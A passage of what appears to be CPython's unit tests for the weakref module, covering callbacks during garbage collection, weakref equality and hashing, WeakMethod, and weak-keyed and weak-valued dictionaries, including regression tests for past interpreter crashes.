alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlaying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_valued_union_operators(self):
a = C()
b = C()
c = C()
wvd1 = weakref.WeakValueDictionary({1: a})
wvd2 = weakref.WeakValueDictionary({1: b, 2: a})
wvd3 = wvd1.copy()
d1 = {1: c, 3: b}
pairs = [(5, c), (6, b)]
tmp1 = wvd1 | wvd2 # Between two WeakValueDictionaries
self.assertEqual(dict(tmp1), dict(wvd1) | dict(wvd2))
self.assertIs(type(tmp1), weakref.WeakValueDictionary)
wvd1 |= wvd2
self.assertEqual(wvd1, tmp1)
tmp2 = wvd2 | d1 # Between WeakValueDictionary and mapping
self.assertEqual(dict(tmp2), dict(wvd2) | d1)
self.assertIs(type(tmp2), weakref.WeakValueDictionary)
wvd2 |= d1
self.assertEqual(wvd2, tmp2)
tmp3 = wvd3.copy() # Between WeakValueDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wvd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakValueDictionary)
tmp4 = d1 | wvd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wvd3))
self.assertIs(type(tmp4), weakref.WeakValueDictionary)
del a
self.assertNotIn(2, tmp1)
self.assertNotIn(2, tmp2)
self.assertNotIn(1, tmp3)
self.assertNotIn(1, tmp4)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_keyed_union_operators(self):
o1 = C()
o2 = C()
o3 = C()
wkd1 = weakref.WeakKeyDictionary({o1: 1, o2: 2})
wkd2 = weakref.WeakKeyDictionary({o3: 3, o1: 4})
wkd3 = wkd1.copy()
d1 = {o2: '5', o3: '6'}
pairs = [(o2, 7), (o3, 8)]
tmp1 = wkd1 | wkd2 # Between two WeakKeyDictionaries
self.assertEqual(dict(tmp1), dict(wkd1) | dict(wkd2))
self.assertIs(type(tmp1), weakref.WeakKeyDictionary)
wkd1 |= wkd2
self.assertEqual(wkd1, tmp1)
tmp2 = wkd2 | d1 # Between WeakKeyDictionary and mapping
self.assertEqual(dict(tmp2), dict(wkd2) | d1)
self.assertIs(type(tmp2), weakref.WeakKeyDictionary)
wkd2 |= d1
self.assertEqual(wkd2, tmp2)
tmp3 = wkd3.copy() # Between WeakKeyDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wkd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakKeyDictionary)
tmp4 = d1 | wkd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wkd3))
self.assertIs(type(tmp4), weakref.WeakKeyDictionary)
del o1
self.assertNotIn(4, tmp1.values())
self.assertNotIn(4, tmp2.values())
self.assertNotIn(1, tmp3.values())
self.assertNotIn(1, tmp4.values())
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
